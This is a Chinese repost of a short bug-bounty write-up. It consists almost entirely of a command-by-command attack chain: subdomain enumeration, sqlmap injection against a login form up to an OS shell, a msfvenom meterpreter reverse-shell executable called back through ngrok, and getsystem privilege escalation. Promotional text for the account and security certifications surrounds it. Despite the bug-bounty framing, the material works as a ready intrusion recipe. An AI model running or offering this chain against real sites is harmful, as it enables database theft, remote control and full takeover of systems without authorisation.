来源:Medium,作者:RyuuKhagetsu
现在只对常读和星标的公众号才展示大图推送,建议大家把潇湘信安“设为星标”,否则可能看不到了!
正文
amass enum -d site.com -passive | anew subs.txt && subfinder -d site.com -silent | anew subs.txt
cat subs.txt | httpx -mc 200 -o 200-subs.txt
sqlmap -u “https://www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — dbs
sqlmap -u “https://www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — is-dba
sqlmap -u “https://www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — os-shell
我在心里想:“我可以获取管理员用户吗?” 我尝试使用 Metasploit 和 Ngrok 进行反向连接。
打开终端并使用命令启动 ngrok
ngrok TCP 1337
msfvenom -p windows/meterpreter/reverse_tcp lhost=*without tcp://* lport=*Enter the port* -f exe -o back.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 1337 ( If you are using a different port, then use the port you specified when setting up “ngrok tcp port” )
exploit
nt authority\*not_administrator*
getsystem
getuid
我立即报告了我的发现,并且由于我发现的错误,我收到了几个确认和奖励,因为它们包含多个网站。
可能我的就这些吧,希望能给大家一个参考,我是RyuuKhagetsu,下篇文章见。
关注我们
还在等什么?赶紧点击下方名片开始学习吧!
信 安 考 证
CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001...
推 荐 阅 读